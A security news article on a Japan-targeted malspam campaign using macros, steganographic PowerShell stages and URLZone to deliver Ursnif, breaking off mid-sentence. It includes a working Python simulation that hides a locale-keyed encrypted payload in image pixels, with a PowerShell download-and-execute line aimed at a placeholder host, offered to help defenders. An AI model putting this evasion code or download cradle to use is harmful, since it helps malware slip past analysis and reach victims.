Attack Combines Phishing, Steganography, PowerShell to Deliver Malware

URLZone Morphs Into a Downloader for Ursnif


Researchers have discovered a malware campaign targeting Japan that combines phishing, steganography, PowerShell, and the URLZone and Ursnif malware families.


The basic process described in a new report from Cybereason is a malspam campaign that delivers a weaponized Excel document containing a PowerShell script. The script downloads steganographic images and extracts from them further PowerShell code that is Base64-encoded, AES-encrypted and compressed. That code subsequently downloads a stripped-down version of URLZone, which is then used as a downloader for the Ursnif banking trojan.


The key elements of the campaign are that it is finely targeted at Japanese users, and that URLZone has been repurposed as an evasive downloader. Delivering URLZone through PowerShell stages hidden in images is intended to evade detection.


The targeting is applied first through the malspam campaign itself, and secondly through a series of location checks performed by the malware. The initial Excel file uses a VBA macro to check the machine's country setting. If it is not 'Japan', the application closes; otherwise it proceeds. The embedded PowerShell script then downloads a 600x600 pixel image and extracts and decodes more PowerShell code from it. The extracted code retrieves the initial payload, which is again hidden steganographically. The payload is extracted and decrypted, and at this point a further geographic/language check is made: the code reads the machine's locale identifier (LCID) through the PowerShell Get-Culture cmdlet, as (&Get-Culture).LCID, and uses that value as part of the decryption routine, so the payload will not decrypt correctly on a machine with a different locale.
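The chain described above, as an added simulation written for this page (it is not Cybereason's code and not the malware's): a second-stage script is compressed, encrypted with a key derived from the victim's LCID, Base64-encoded and hidden in the least-significant bits of a 600x600 grayscale cover image, then recovered the way the PowerShell stage would recover it. Everything here is an assumption for illustration: the 1-bit-per-pixel LSB layout with a 32-bit length header, the key derivation from the LCID, an HMAC-SHA256 keystream XOR standing in for AES so the example needs only the standard library, and the stand-in stage script and URL. The LCID values are real: 1041 is ja-JP and 1033 is en-US.

```python
"""Locale-keyed payload hidden in an image (constructed simulation, not the real campaign code)."""
import base64
import hashlib
import hmac
import struct
import zlib
from typing import Optional

JAPANESE_LCID = 1041   # (Get-Culture).LCID on a Japanese Windows install (ja-JP)
ENGLISH_US_LCID = 1033  # en-US, e.g. a typical non-Japanese sandbox
WIDTH = HEIGHT = 600    # cover image size used by the campaign

# Constructed stand-in for the real second-stage script; the host is a reserved non-routable name.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage3')"


def lcid_key(lcid: int) -> bytes:
    """Assumed key derivation: the decryption key depends on the victim's locale identifier."""
    return hashlib.sha256(b"stage2-key" + struct.pack("<I", lcid)).digest()


def keystream(key: bytes, length: int) -> bytes:
    """Counter-mode style keystream from HMAC-SHA256; stand-in for AES so the example is stdlib-only."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor_crypt(data: bytes, key: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def wrap_payload(script: str, lcid: int) -> bytes:
    """compress -> encrypt under the locale-derived key -> authenticate -> Base64."""
    key = lcid_key(lcid)
    ciphertext = xor_crypt(zlib.compress(script.encode()), key)
    tag = hmac.new(key, ciphertext, hashlib.sha256).digest()
    return base64.b64encode(tag + ciphertext)


def unwrap_payload(blob: bytes, lcid: int) -> Optional[str]:
    """Reverse of wrap_payload; returns None when the locale (and so the key) is wrong."""
    raw = base64.b64decode(blob)
    tag, ciphertext = raw[:32], raw[32:]
    key = lcid_key(lcid)
    if not hmac.compare_digest(tag, hmac.new(key, ciphertext, hashlib.sha256).digest()):
        return None
    try:
        return zlib.decompress(xor_crypt(ciphertext, key)).decode()
    except (zlib.error, UnicodeDecodeError):
        return None


def embed(image: bytearray, data: bytes) -> bytearray:
    """Hide a 32-bit big-endian length header plus data in pixel LSBs, one bit per pixel, MSB first."""
    payload = struct.pack(">I", len(data)) + data
    if len(payload) * 8 > len(image):
        raise ValueError("payload too large for cover image")
    img = bytearray(image)
    for i, byte in enumerate(payload):
        for bit in range(8):
            idx = i * 8 + bit
            img[idx] = (img[idx] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return img


def extract(image: bytes) -> bytes:
    """Read the length header from the first 32 pixels, then that many bytes from the LSBs that follow."""
    def read_bytes(start: int, n: int) -> bytes:
        out = bytearray()
        for i in range(n):
            b = 0
            for bit in range(8):
                b = (b << 1) | (image[(start + i) * 8 + bit] & 1)
            out.append(b)
        return bytes(out)
    length = struct.unpack(">I", read_bytes(0, 4))[0]
    return read_bytes(4, length)


def build_stego_image(script: str = STAGE2, lcid: int = JAPANESE_LCID) -> bytearray:
    """Attacker side: deterministic synthetic grayscale cover with the wrapped stage embedded."""
    cover = bytearray((i * 31 + 7) & 0xFF for i in range(WIDTH * HEIGHT))
    return embed(cover, wrap_payload(script, lcid))


def recover_stage(image: bytes, lcid: int) -> Optional[str]:
    """Victim side: what the PowerShell stage does after reading (Get-Culture).LCID."""
    return unwrap_payload(extract(image), lcid)


if __name__ == "__main__":
    img = build_stego_image()
    print("ja-JP host :", recover_stage(img, JAPANESE_LCID))
    print("en-US host :", recover_stage(img, ENGLISH_US_LCID))
```

The point for a defender is the second call: an analysis VM whose locale is not ja-JP never obtains the next stage, so detonating the lure outside a Japanese locale shows only an image download and a PowerShell script that appears to do nothing. When reproducing such a sample, set the sandbox's culture to match the targeted region, or patch the LCID read, before expecting the later stages to appear.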


The initial payload is essentially URLZone. URLZone, aka Bebloh and Shiotab, is a banking trojan that first appeared in 2009. It uses man-in-the-browser techniques and Windows API call hooking to steal banking information. Its use against ..